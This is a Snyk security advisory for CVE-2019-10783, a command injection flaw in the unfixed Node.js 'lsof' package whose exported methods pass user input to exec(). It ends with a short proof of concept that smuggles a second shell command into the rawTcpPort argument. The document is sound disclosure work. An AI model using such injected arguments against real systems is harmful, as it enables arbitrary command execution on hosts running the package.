Command Injection Affecting lsof package, versions *
Snyk CVSS
- Attack Complexity: Low
- Confidentiality: High
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 2.93% (90th percentile)
- Snyk ID SNYK-JS-LSOF-543632
- published 29 Jan 2020
- disclosed 29 Jan 2020
- credit JHU System Security Lab
- Introduced: 29 Jan 2020
- CVE-2019-10783

How to fix?
There is no fixed version for lsof.
Overview
lsof is a Node.js package for running and processing lsof.
Affected versions of this package are vulnerable to Command Injection. Multiple areas of the package are vulnerable to command injection: every exported method of the package passes user input into the exec function, so shell metacharacters in that input are interpreted by the shell rather than treated as a literal argument.
PoC by JHU System Security Lab
// The argument is concatenated into a shell command and passed to exec(), so the
// shell runs the injected "echo vulnerable > create.txt" alongside lsof.
var root = require("lsof");
var attack_code = "& echo vulnerable > create.txt &";
root.rawTcpPort(attack_code, function () {});